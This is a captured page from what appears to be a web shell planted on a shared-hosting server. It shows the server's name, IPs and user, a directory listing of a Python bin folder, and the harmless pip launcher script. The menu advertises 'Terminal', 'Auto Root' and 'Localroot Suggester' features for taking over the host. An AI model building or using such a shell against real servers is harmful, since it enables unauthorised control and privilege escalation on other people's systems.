Linux business57.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
Server IP : 199.188.201.191 & Your IP : 3.144.240.141
Domains :
Cant Read [ /etc/named.conf ]
User : derozboy
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
python38 /
bin /
Delete
Unzip
Name
Size
Permission
Date
Action
2to3
108
B
-rwxr-xr-x
2024-09-23 11:26
lswsgi
102.82
KB
-rwxr-xr-x
2021-02-24 15:34
msgfmt3.8.py
7.42
KB
-rwxr-xr-x
2024-09-06 20:41
msgfmt3.py
7.42
KB
-rwxr-xr-x
2024-09-06 20:41
pathfix.py
6.64
KB
-rwxr-xr-x
2024-09-06 20:41
pip
661
B
-rwxr-xr-x
2023-11-13 21:40
pip-3
661
B
-rwxr-xr-x
2023-11-13 21:40
pip-3.8
661
B
-rwxr-xr-x
2023-11-13 21:40
pip3
661
B
-rwxr-xr-x
2023-11-13 21:40
pip3.8
661
B
-rwxr-xr-x
2023-11-13 21:40
pydoc3
91
B
-rwxr-xr-x
2024-09-23 11:26
pydoc3.8
91
B
-rwxr-xr-x
2024-09-23 11:26
pygettext3.8.py
21.04
KB
-rwxr-xr-x
2024-09-06 20:41
pygettext3.py
21.04
KB
-rwxr-xr-x
2024-09-06 20:41
python3
7.57
KB
-rwxr-xr-x
2024-09-23 11:26
python3-config
171
B
-rwxr-xr-x
2024-09-23 11:26
python3.8
7.57
KB
-rwxr-xr-x
2024-09-23 11:26
python3.8-config
171
B
-rwxr-xr-x
2024-09-23 11:26
python3.8-x86_64-config
3.42
KB
-rwxr-xr-x
2024-09-23 11:19
Save
Rename
#!/opt/alt/python38/bin/python3 # -*- coding: utf-8 -*- import re import sys try: from pip._internal.cli.main import main except ImportError: try: from pip._internal.main import main except ImportError: try: # If the user has downgraded pip, the above import will fail. # Let's try older methods of invoking it: # pip 19 uses this from pip._internal import main except ImportError: # older pip versions use this from pip import main if __name__ == '__main__': sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0]) sys.exit(main())